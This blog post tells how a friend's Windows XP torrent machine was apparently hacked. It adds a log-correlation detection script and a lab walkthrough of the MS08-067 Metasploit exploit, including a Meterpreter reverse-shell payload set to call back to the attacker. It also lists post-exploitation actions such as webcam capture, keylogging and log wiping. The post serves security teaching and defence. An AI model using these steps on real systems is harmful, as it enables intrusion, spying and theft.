We sat, had a few drinks, and he told me he had a couple of open source projects he was working on; he also described the technologies he had implemented to get one of his projects going. “Wait! Do these things actually exist?!” I asked… “Yes they do!”, he replied. Okay, I think I am going a little bit fast here. It all started when I was having a chat with one of my associates (a long-time close associate, to be exact); he was telling me how excited he was to have spent the last couple of months investing in learning and implementing open source based server solutions. Most of his projects start off with him downloading a couple of Linux-based software packages (.iso images) in the form of torrents from Distrowatch using his TorrentBox. “What did you say, TorrentBox?” I asked. “Wait! Do these things actually exist?!” I asked (again, without even giving him the chance to answer)… “Yes they do!”, he replied. My questions or reasoning didn’t seem to move him, and neither did his projects (as a whole)! His major concern was what he kept referring to as the “Windows TorrentBox Hacked!” issue…! Say what!?
Without dwelling much on the setup of his TorrentBox, he volunteered to show me. He quickly switched on his laptop, logged in and immediately fired up his VMware Workstation console (which he uses to centrally administer all his virtual machines) before proceeding to power up the TorrentBox virtual machine in question.
The first thing I saw was the screen on the left. Immediately I was hoping that the situation he was facing was not the same issue I had come across (several times), the last being sometime last year in June. Okay, let me hold that thought for a bit: I asked him to log on, as I wanted to confirm the System Properties, and I saw the screen below;
A combination of both screens, that is, Windows XP + Service Pack 2, is never a good coalition, let alone the fact that Microsoft publicly announced that they had discontinued their support for Windows XP as of the 8th of April 2014! This is one of those few scenarios where I am quick to jump to conclusions 🙂 ; my associate was a victim of the;
Windows XP Hack
Based on the information that my associate had provided, that is;
- He had picked up that there was quite a lot of high bandwidth usage that he could not account for, in the sense that he was not the one who had actually used it. In some cases he had no pending or queued torrents at all and was away on holiday.
- After going through the firewall logs, he noticed a particular IP address that regularly connected to this box. The firewall rules for the TorrentBox were very lax, that is, he allowed unrestricted outgoing and incoming traffic on any port between the TorrentBox and any destination on the Internet. Fortunately, he had enabled logging for all the traffic to and from the TorrentBox.
- Every time he tried to correlate the ‘dodgy IP’ address’s connection times on the firewall with the system events on the TorrentBox, he noticed that most of the time the logs would be empty. Something was clearing the logs to hide its activity on the system.
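Turning the three symptoms above into checks a defender can actually run, as an added example that is not part of the original post. It takes the TorrentBox address from the post (192.168.179.130), assumes a local subnet of 192.168.179.0/24 and a simple constructed firewall line format (adapt the regex to your own device), and uses Windows XP Security event ID 517 (“The audit log was cleared”; 1102 on Vista and later) as the log-clearing signal. All firewall lines and event records below are constructed sample data.

```python
"""Added example (not from the original post): correlate perimeter firewall
logs with Windows XP event records to flag (1) an outside address that keeps
coming back, (2) inbound SMB reaching the box from outside, and (3) host logs
that were cleared, or are simply empty, around those connections."""

import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

BOX_IP = "192.168.179.130"                      # the TorrentBox address used in the post
LAN = ipaddress.ip_network("192.168.179.0/24")  # assumed local subnet
SMB_PORTS = {139, 445}                          # NetBIOS session / microsoft-ds
LOG_CLEARED_IDS = {517, 1102}                   # 517: XP/2003 "audit log was cleared"; 1102: Vista+
TS_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed firewall log: "timestamp action proto src:sport -> dst:dport".
FIREWALL_LOG = """\
2014-06-02 01:14:05 ACCEPT TCP 203.0.113.45:51122 -> 192.168.179.130:445
2014-06-02 01:14:07 ACCEPT TCP 192.168.179.130:1041 -> 203.0.113.45:8080
2014-06-02 22:30:11 ACCEPT TCP 198.51.100.7:6881 -> 192.168.179.130:6881
2014-06-03 01:02:49 ACCEPT TCP 203.0.113.45:50219 -> 192.168.179.130:445
2014-06-03 01:02:52 ACCEPT TCP 192.168.179.130:1055 -> 203.0.113.45:8080
2014-06-04 03:19:20 ACCEPT TCP 203.0.113.45:49801 -> 192.168.179.130:445
"""

# Constructed XP event records: (timestamp, log name, event id, message).
EVENT_LOG = [
    ("2014-06-02 00:10:00", "System", 7036, "The Server service entered the running state."),
    ("2014-06-02 01:16:30", "Security", 517, "The audit log was cleared."),
    ("2014-06-02 22:30:15", "System", 7036, "The Workstation service entered the running state."),
    ("2014-06-03 01:05:02", "Security", 517, "The audit log was cleared."),
]

FW_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_firewall(text):
    """Parse the constructed firewall format into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = FW_LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        entries.append({"ts": datetime.strptime(d["ts"], TS_FMT), "action": d["action"],
                        "proto": d["proto"], "src": d["src"], "sport": int(d["sport"]),
                        "dst": d["dst"], "dport": int(d["dport"])})
    return entries


def in_lan(ip):
    return ipaddress.ip_address(ip) in LAN


def recurring_outside_sources(entries, min_days=2):
    """Symptom 1: an outside address that keeps coming back to the box on different days."""
    days = defaultdict(set)
    for e in entries:
        if e["dst"] == BOX_IP and not in_lan(e["src"]):
            days[e["src"]].add(e["ts"].date())
    return {ip: len(d) for ip, d in days.items() if len(d) >= min_days}


def inbound_smb_from_outside(entries):
    """Symptom 2: SMB (139/445) reached from outside the LAN; an any/any rule lets this through."""
    return [e for e in entries
            if e["dst"] == BOX_IP and e["dport"] in SMB_PORTS and not in_lan(e["src"])]


def callbacks_after_smb(entries, window=timedelta(minutes=5)):
    """The box opening a connection back to the same outside address right after the inbound
    SMB hit: what a reverse-connecting payload looks like from the perimeter."""
    hits = []
    for hit in inbound_smb_from_outside(entries):
        for e in entries:
            if (e["src"] == BOX_IP and e["dst"] == hit["src"]
                    and hit["ts"] < e["ts"] <= hit["ts"] + window):
                hits.append((hit["ts"], hit["src"], e["dport"]))
    return hits


def log_clears_after_smb(entries, events, window=timedelta(minutes=30)):
    """Symptom 3a: a 'log cleared' event shortly after an inbound SMB hit from outside."""
    hits = []
    for ts, _log, event_id, _msg in events:
        if event_id not in LOG_CLEARED_IDS:
            continue
        t = datetime.strptime(ts, TS_FMT)
        for hit in inbound_smb_from_outside(entries):
            if hit["ts"] <= t <= hit["ts"] + window:
                hits.append((t, hit["src"]))
                break
    return hits


def silent_windows(entries, events, window=timedelta(minutes=30)):
    """Symptom 3b: inbound SMB hits with no host event at all within +/- window,
    which is what 'the logs would be empty' looks like once events have been wiped."""
    times = [datetime.strptime(ts, TS_FMT) for ts, *_ in events]
    return [hit["ts"] for hit in inbound_smb_from_outside(entries)
            if not any(hit["ts"] - window <= t <= hit["ts"] + window for t in times)]


def analyze(fw_text=FIREWALL_LOG, events=EVENT_LOG):
    entries = parse_firewall(fw_text)
    return {"recurring_sources": recurring_outside_sources(entries),
            "inbound_smb": len(inbound_smb_from_outside(entries)),
            "callbacks": callbacks_after_smb(entries),
            "log_clears": log_clears_after_smb(entries, events),
            "silent_windows": silent_windows(entries, events)}


if __name__ == "__main__":
    for name, value in analyze().items():
        print(f"{name}: {value}")
```

On the sample data the recurring address 203.0.113.45 is reported on three separate days, every one of its three connections lands on port 445, two of them are followed within seconds by the box connecting back out to it, two coincide with a Security log clear, and the third leaves no host event at all in the surrounding half hour. Any one of those signals on its own would have been worth a look; a perimeter rule that blocks 139/445 from the Internet removes the entry point entirely.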
I strongly suspect this is the sequence of events that took place. This is just a proof of concept (PoC) and my assumption. Please note: the following is for demonstration purposes, and the PoC was carried out in a controlled environment. It basically shows you how one can hack a Microsoft Windows XP machine running Service Pack 2 (SP2) and below, that is, Windows XP with no service pack, Windows XP SP1 or Windows XP SP2;
Whilst he was legally downloading the actual files using the torrents from Distrowatch (which is where I would like to believe he grabbed them from, unless he grabbed the torrents from somewhere else), chances are that one of the seeders or leechers he was downloading from or seeding to on a particular torrent had the intention of harvesting the IP addresses of peers. As can be seen on our right, uTorrent has an option that can display all peers currently ‘in it for the torrent’, but then again, not everyone is in it for the torrent. I remember on one of the forums where some self-proclaimed black hat hacker mentioned that he thinks it’s morally ethical to hack illegal downloaders. Eish! I don’t even know what that means; perhaps it’s analogous to saying it’s morally unethical for Robin Hood to steal from the poor, but then again, two wrongs never make a right! Back to my story: you can check my earlier post on some of the dangers of torrenting.
Assuming the harvester (who I will also refer to as the hacker) had managed to grab my associate’s public IP address, and held onto and used it long enough before my associate was assigned another IP address (remember public IP addresses are dynamic), the following could have happened. For demonstration purposes I am using a Windows XP machine also running Service Pack 2, but whose IP address is a private IP address. The hacker ran a ping against the victim’s PC to check if the machine was online. In our demonstration, the IP address is 192.168.179.130. As can be seen, the PC replies to our ping, indicating it is up and running.
The next logical step would be for the hacker to check and see if there are any open ports on the victim’s PC using Nmap. Once they find any, they check to see if there are any corresponding services running on those ports that might be vulnerable. In our case we can see that one of the ports, port 445, is running the microsoft-ds service. This service is used to share printers and files across the network, but is this service vulnerable?
The hacker fires up Nessus to check if any of the services running on the open ports are vulnerable. Voila! We can see that our SMB service is susceptible to the Microsoft Windows Server Service Crafted RPC vulnerability (MS08-067). This vulnerability in the Server service could allow remote code execution, but is there an exploit available for it?
We are going to launch the exploit against our victim’s PC, that is, IP address 192.168.179.130. We select the exploit with the ‘use’ command. That is, we type;
By typing this we set Metasploit to use this exploit on the target machine!
We then proceed to run the following command;
set RHOST 192.168.179.130
RHOST is the target’s IP address, so we are basically setting it to the IP address of the PC we need to attack, in our case 192.168.179.130.
set payload windows/meterpreter/reverse_tcp
The payload is basically code that will be executed on the target system upon successful entry; in our case a Meterpreter (an advanced version of a shell that executes on the remote machine). It gives us access to the remote victim’s shell from our local machine, so it more or less resembles a scenario where you are actually sitting in front of the victim’s physical machine.
set LHOST 192.168.179.128
LHOST is the listener host. This is basically the IP address that you are attacking from. It is the address the victim’s Meterpreter payload connects back to once the exploitation is successful.
Let the games begin!
We launch the attack using Metasploit and, assuming everything works accordingly, we will have access to the remote machine whose Meterpreter connects back to us. At this moment in time we basically have control of the remote machine, that is, the machine whose IP address is 192.168.179.130. In order to prevent our Meterpreter from being killed by the remote user, we should migrate to another process that is already running on the victim’s machine. In order to view the running processes we run the following command; ps
We then migrate our current process to one of the running processes; ideally we migrate to the Explorer.exe process, which is one of the most important processes on Windows.
After successfully migrating from the Svchost.exe process that is currently running with System account privileges, we end up in the Explorer.exe process, which runs with the privileges of the currently logged-in user. From this point onwards we can do whatever we want.
On our left is a screenshot that confirms the details of the victim’s machine. Besides the fact that the victim’s machine is running Windows XP Service Pack 2, we can even see that the currently logged-in user has a list of torrents that he / she plans to download!
That being said, there is a whole list of things that one can do when in control of the victim’s machine. I will list a few;
- Install a backdoor on the victim’s machine, so we can connect back to the victim’s machine anytime without being detected.
- We can activate the webcam attached to the victim’s machine and take snapshots or video recordings of the person who is physically sitting in front of the remote machine.
- We can remotely activate voice recording, so as to record what the victim is saying or listening to.
- We can dump the local user accounts on the victim’s machine; this way we can crack the user accounts’ login passwords (offline) and, assuming Remote Desktop is enabled, even log in with these user accounts.
- We can activate keystroke logging on the victim’s machine; this way we can record all the keyboard input.
- We can even copy, add, delete, rename or modify system files, user documents, folders and files on the machine.
- Last but not least, we can clear the event logs on the victim’s machine so as to hide our activities.
So how can one protect against these types of attacks? The following can be useful:
- Make sure the software you are running, that is, your operating system and applications, is up to date and still supported by the vendor.
- Install a firewall or web-filtering software. Firewalls can help prevent malicious outgoing or incoming traffic, especially if they are used in conjunction with a Network Intrusion Detection System (NIDS) like Snort. Some antivirus software has mechanisms and capabilities to detect whether an incoming or outgoing connection is safe and, if it is detected as unsafe, prevents users from visiting or connecting to the link. Examples are Malwarebytes with Web Protection enabled or ESET Smart Security.
- The safest option is to stay away from Microsoft Windows XP! Either upgrade your operating system to a higher version or chuck that machine in the bin 🙂 If you can’t get rid of it, at least make sure it’s not connected to the network in any way, that is, neither the internal local area network nor the Internet.
For testing purposes: chances are, if you are trying to simulate the above Windows XP hack lab environment and are failing to exploit the test machine (despite it being a Windows XP machine with Service Pack 2), it could be because of the following reasons;
- The firewall is enabled or running on the victim’s machine; you have to disable it.
- The system is patched; the above exploit does not work on a fully patched Windows XP machine with Service Pack 3.
- An antivirus with firewall capabilities is running on the victim’s machine; disable it.
The above module exploits a parsing flaw in the path canonicalization code of netapi32.dll through the Server service, which allows remote code execution. This vulnerability affects all Windows XP machines whose service pack is version 2 and below. Nonetheless, even if one runs Windows XP with Service Pack 3, Windows XP as a whole has so many security holes! Remember, Microsoft does not support Windows XP anymore; that alone speaks volumes. It is highly advisable never to connect these systems to the Internet at all, as connecting them exposes them to these types of exploitation. My associate even made his situation worse by downloading torrents via a public tracker; with public trackers, anyone anywhere in the world who is also downloading (or posing to be downloading, but with other ulterior motives) the same torrent can view your public IP address. This potentially increases your chances of being hacked!
In a nutshell, people should desist from using unsupported operating systems (OSes), let alone connect machines running these vulnerable OSes to the Internet. I hope the above scenario has given you an idea of how this vulnerability can be easily triggered and exploited.
After all is said and done, remember to stay away from Windows XP; there is always a reason behind the message!